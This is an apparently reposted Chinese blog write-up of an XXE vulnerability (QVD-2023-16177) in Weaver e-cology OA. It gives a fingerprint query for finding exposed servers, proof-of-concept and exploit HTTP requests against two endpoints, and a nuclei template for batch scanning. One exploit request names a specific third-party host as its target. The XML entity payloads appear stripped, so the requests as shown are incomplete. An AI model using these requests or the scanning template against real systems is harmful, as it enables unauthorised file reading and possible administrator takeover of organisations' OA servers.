| 泛微E | 您所在的位置:网站首页 › QVD › 泛微E |
|
标签:xml application QVD cology 漏洞 XXE 2023 泛微
漏洞概述 泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。 影响版本泛微 EC 9.x 且补丁版本 < 10.58.2 泛微 EC 8.x 且补丁版本 < 10.58.2 漏洞复现鹰图指纹:app.name="泛微 e-cology 9.0 OA" 登录页面如下: POC: POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1 Host: your-ip Content-Type: application/xml &send;出现以上响应则说明存在该漏洞 EXP1: POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1 Host: oa.emotoradvance.com:8008 Content-Type: application/xml &send;exp2: POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 Host: your-ip Content-Type: application/xml &send;注:两个exp的区别在于漏洞路径不一样 vps也出现了请求 nuclei批量yaml文件 id: ecology-XXE-QVD-2023-16177 info: name: 泛微E-Cology XXE漏洞 author: mhb17 severity: critical description: 泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限 reference: - https://blog.csdn.net/qq_41904294/article/details/131878446 tags: ecology,XXE requests: - raw: - |- POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Content-Type: application/xml Content-Length: 32 &send; matchers-condition: and matchers: - type: binary part: body binary: - e5bc82e69e84 - type: word part: header words: - '200' 标签:xml,application,QVD,cology,漏洞,XXE,2023,泛微 From: https://www.cnblogs.com/pursue-security/p/17677321.html |
| CopyRight 2018-2019 实验室设备网 版权所有 |